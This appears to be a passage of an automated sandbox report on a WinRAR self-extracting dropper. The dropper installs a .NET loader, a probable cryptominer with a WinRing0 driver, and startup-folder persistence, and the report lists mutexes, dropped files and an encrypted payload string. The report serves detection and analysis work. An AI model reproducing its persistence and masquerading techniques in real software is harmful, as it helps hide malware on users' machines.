Source: 22.0.AudioClip.exe.df0000.0.unpack, Program.cs	Base64 encoded string: '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
Source: 32.2.AudioClip.exe.c80000.0.unpack, Program.cs	Base64 encoded string: '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
Source: 32.0.AudioClip.exe.c80000.0.unpack, Program.cs	Base64 encoded string: 'MNG+hTpVQcJ++8ARw8qLN2PN5xttsggS8bYBX47jwg2bWi+DAjXZAp8kyCawx57fdk4u9UHUNP6xdamkyNxKeCzlLetsA84tcF1MHSpjiFbQmpRFn9eOPnDvax5G9CM+iotBpw/a5RbGCufMqetVpO9CBpVfkuAT+vOHOOqO2YE7d68Q0XMmaUSMWiQjnrAtA0eoJU6aQ8EUXpTalBE0ZXUeuDc/tTabF+3LdWw7vE5IC9Mo6NPtBXNd95Der6vnng1WPl572TqdBzt3XoPb/bHk32VlTn1ZrospqhhF5Vh92JrgSWMadWLe0uroD8zJRjfAMUpAfaCzVo/IzBNAmeageeMfdtDEnHi1BWRaahQ9w1VK3XbHAzzvTwLPuWvP4+zlDOxXb8eNhQSxFDUgYGE0TVTYTvwZf9dvFNxSI50jHc6dVOm2w+R8CUMVaBNxBBx0mdFMpHOZYK2Qb8W4oFbJL2bMYpwBdfiemZQWMogofIAcsjkxV3UDqSbTX1IMf00TE9G0TBKsMEzTDC0Q4BYAyUW1u0fiRrUEpD1DOFoYbd20Cd2Zbu5eMZgcMd5s7EcyjDsn8m+sInKMnMYLkugCz4IMt02XDzXj7XSQVM24wGkaH2qx3bdcLrvPMUil1CE9HpYZvP4hj8Ta6Xu7SsjzsBpKROaO2nilbeMSha2f8FcJ4hKw2fwfc8EfpjzahsSagVgIXvQjAi4ykbRIWZ22tyko55m4krUb10X+sbz1wdiAwCUZdmDl+xaAEG/tE/hHVx4m66k7UVBvfJs/TScmbVMBDwRKxWhQ/yWVkNKW/yW8L73EcD4Q6wna0hzH+TgjPR3TNXpKC7T0Dj9Mw0A4j0bHTZEl/w9jwL30Jj7HMSTg+leKb6aJUlONVNOijoVB0OtgyBh7PxHnUpL5vcgj3VqaSRxUp+U11rdnWaqSIpgVjDvUfAmZhpvcF/83SPvX1qE9NA5kPdT97rZSCXlxjrjFET9hi1IiUBkZ9bmC80VGPbUhJMikwFjujvloHrIPANt+3dzgxNywQW/HGRQut99l0R+W0bUosFg2/2vJZ3US/lvHYVyugGYO7UbPzZKOuurBMXnqmkf1ewwElC/T3H0Hytz2d6T1NFeKVxwmgVjWmpL4UAKPWd3jZ1i54ydj0vhWsfcQjMJqsFxN+IlIRd5BjzjrgemGwkerV0nr1q0pyn9scpdR0+dTGTsEkgW1ptT60uFXkgetJ6sbpIzP0BVJ/btZ0HZ5JJDbZ9PgjlVLTWZFEFDUdcD8aJBEHYx2GyJ8niLrAhAgsGPkLx972fEvkjSqItBgWsnZCQqDxS1PmZ7YqOUmSKQ0JuSfiBL2jZL8+9rziSB0atr4plSleDWVc04pW/MEthm8xhMeNGwUvmm7G/f8ow7E4zt+3wobWAlUEBHS+pDQ9tCD8v+R4VsqPEwirumvaPHc47feUn7a0GfYJVkxGgv/o+q/JghakdkqaPrsLqgH2i+WexPn0kdSpbPpuiaf9nxQew1nhaYBs/BqR0Mdo221XB7AUk9/xDe1IuOW4c4L/UNPT5Ogf09aeGjtw0Vef0znnYfbuSlCVCGaeRqFxvH5TyAsCMSgNNCRzd+NU03RZLtQv8zoLZ9C0Q009Fz/dX6Wymfuk7OpiKoFIN15Vlnw2XlBeX3iXixU2aNG5Eefte+qXsUECFh4/ccwxZlnwN5SmSjvBdRm3se+hP8pdA0W5Bgr6gnmR+fkdojs+M6qJ+TK+3YjNRYEfW0fRbXxS29ehJsb0OCAShrAlehgmTca/PEPt/ZNK5fbjztnDwq98pACuZexrZ5+1PmlOn7IZTrnxn8wfIAOaiCpbwc7P+PMnBPdgObQqPseHgOkeKCleCApP+rMqSPKK+t4VVmHbduJkohNqqYb0UpW8O4TZCRv5DLzYkyjCY72DFihMjJ7B5tBauKb5FF5XxxVSEPxacFYuSc0WWKcLDi6bywSuTQY7yhYU4I5i9UX/hxCQb0/PUBF1Nm7NXMm9KDqVzWST8ynkFZBQCtYVFdd61QeCHO1iEC1BYCVp8DZ3So7HbIl1q+DvQFsLbsScgAdwbotspTrfqWc/011WJ0CBCFjdp72q7FLwEa62j5fnYOLOyxG+1lW8Jh+IY3QZfFTFghwEkVs2zpc2qX6saHWVVCn6Zm922E40QQ0qXN6Z4blLTVbBAYE13VKYM+L5PkzARwcjUa2m8iXUwTHKSpTNQ9om+9rqgBiIGtVU8XiRMhQFm8xshwaFYytMYOjEJj89MQ//Lp6vV0x4g1yodX/MtGOo2f4NbVp5kClYYAdIiMwKvQnAyAAL5h1JkV0ikTYLmfo3jD/GuYFLYht6rghV165x2ks5tgiQqk+MOgnOdHoWoBAFZia+wQ09l5v5v8c9vu0+3Y0Rv2PfbxvwesGpDuoNPMkydGk4+HxOpb/MFODP6FxXSB5gYykhe9T87Lhj+69OsJsMP1FNfBt4jkfy5tlA4DjW3SgTZH8jdHDQ869nXGRJtkDJyc2UTIxAaGPvnS4Mv9RUEKYpZLf88hV8JPOv3ytq4gKUF0hWCM5rrraY+PILO0USRK82JdsZ5JzYMxp716nOaGCwmXmbi6ASYYB/wlPg8yeZvjz8mcBPLi/8SLA0BxA42G0DU1chqbTEOH2285I4/c5HyjthhBn2F9s9q5zwjbXU7Rr6OAAVSuBbPw2sV0sC1l8/LU1G2HbtA8Jes6ZRqs182+t4PosYFT5D0hu9z9KWOb78wLs85Jtys5rJVsIaT7LP/nGqKIY8/rmpY7zzm4E+/xmNShCMformcqvm4L2zh+qAr3C/PXQ/4gmRRnDNFeaMLKxMAYTziaMGU3uzlr+6oD/7Kr5ijCTxkf6vzCm29/6gO914WfoqNoButedYv9eXhJnFPmTWLpfI1WSpqiqDxbglvjpbyM/7moihyeGn6D3VODOytYFx9rfT65NNdXJQqFxttpW0UDZDp+crihcBg1yEMN330Z

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Mutant created: \Sessions\1\BaseNamedObjects\7349a13a3bce5aba1f9f
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3944:120:WilError_01
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Mutant created: \Sessions\1\BaseNamedObjects\xZazf3o5Jo4IzeU4

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Command line argument: sfxname	0_2_00BBD42A
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Command line argument: sfxstime	0_2_00BBD42A
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Command line argument: STARTDLG	0_2_00BBD42A

Source: services.exe.0.dr, rEkhiQbXkHXKe.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: AudioClip.exe.0.dr, RijnDael.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.services.exe.c10000.0.unpack, rEkhiQbXkHXKe.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 14.0.services.exe.c10000.0.unpack, rEkhiQbXkHXKe.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 21.2.services.exe.710000.0.unpack, rEkhiQbXkHXKe.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 21.0.services.exe.710000.0.unpack, rEkhiQbXkHXKe.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: 2rVBokoc2C.exe

Static file information: File size 4514981 > 1048576

Source: 2rVBokoc2C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2rVBokoc2C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2rVBokoc2C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2rVBokoc2C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2rVBokoc2C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2rVBokoc2C.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 2rVBokoc2C.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 2rVBokoc2C.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 2rVBokoc2C.exe
Source:	Binary string: cvtres.pdbAQnS source: cvtres.exe, 00000021.00000003.612189049.0000000003120000.00000004.00001000.00020000.00000000.sdmp, svhproxy.33.dr
Source:	Binary string: c:\Users\miki\Documents\Visual Studio 2012\Projects\DeskRindj\DeskRindj\obj\Debug\DeskRindj.pdb source: AudioClip.exe, 00000016.00000002.745607167.0000000000DF2000.00000002.00000001.01000000.0000000B.sdmp, AudioClip.exe, 00000020.00000002.529122119.0000000000C82000.00000002.00000001.01000000.00000011.sdmp, AudioClip.exe.22.dr, AudioClip.exe.0.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 2rVBokoc2C.exe, 00000000.00000003.428989136.00000000065D0000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.dr
Source:	Binary string: cvtres.pdb source: cvtres.exe, 00000021.00000003.612189049.0000000003120000.00000004.00001000.00020000.00000000.sdmp, svhproxy.33.dr

Source: 2rVBokoc2C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2rVBokoc2C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2rVBokoc2C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2rVBokoc2C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2rVBokoc2C.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Unpacked PE file: 22.2.AudioClip.exe.df0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Unpacked PE file: 32.2.AudioClip.exe.c80000.0.unpack

.NET source code contains potential unpacker

Source: AudioClip.exe.0.dr, Program.cs	.Net Code: Main System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: AudioClip.exe.22.dr, Program.cs	.Net Code: Main System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 22.2.AudioClip.exe.df0000.0.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 22.0.AudioClip.exe.df0000.0.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 32.2.AudioClip.exe.c80000.0.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 32.0.AudioClip.exe.c80000.0.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BBE0E4 push eax; ret		0_2_00BBE102
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Code function: 0_2_00BBEBA6 push ecx; ret		0_2_00BBEBB9

Source: 2rVBokoc2C.exe	Static PE information: section name: .didat
Source: wininit.exe.0.dr	Static PE information: section name: _RANDOMX
Source: wininit.exe.0.dr	Static PE information: section name: _SHA3_25
Source: wininit.exe.0.dr	Static PE information: section name: _TEXT_CN
Source: wininit.exe.0.dr	Static PE information: section name: _TEXT_CN
Source: wininit.exe.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

File created: C:\Users\user\AppData\Roaming\01Atodo\__tmp_rar_sfx_access_check_4433265

Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.994784385322995

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

File created: C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys

Jump to behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File created: C:\Users\user\AppData\Roaming\01Atodo\services.exe			Jump to dropped file
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File created: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

File created: C:\ProgramData\eWTBqYYAek\svhproxy

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

File created: C:\ProgramData\eWTBqYYAek\svhproxy

Jump to dropped file

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File created: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Jump to dropped file
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File created: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File created: C:\Users\user\AppData\Roaming\01Atodo\WinRing0x64.sys	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	File created: C:\ProgramData\eWTBqYYAek\svhproxy	Jump to dropped file
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File created: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe

Jump to dropped file

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe.lnk	Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs.lnk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe.lnk

Jump to behavior

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
